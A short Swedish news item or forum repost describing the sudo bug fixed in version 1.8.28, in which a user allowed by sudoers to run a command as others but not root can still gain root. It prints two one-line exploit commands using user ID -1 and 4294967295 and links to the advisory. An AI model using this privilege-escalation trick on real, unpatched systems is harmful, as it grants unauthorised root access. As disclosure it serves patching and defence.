En bugg i sudo låter dig köra vilken körbar fil som helst som root om /etc/sudoers tillåter att den körs av andra användare och är förbjuden för root.
Utnyttjandet av felet är mycket enkelt:
sudo -u#-1 id -u
eller:
sudo -u#4294967295 id -u
Felet finns i alla versioner av sudo före 1.8.28
detaljer:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Källa: linux.org.ru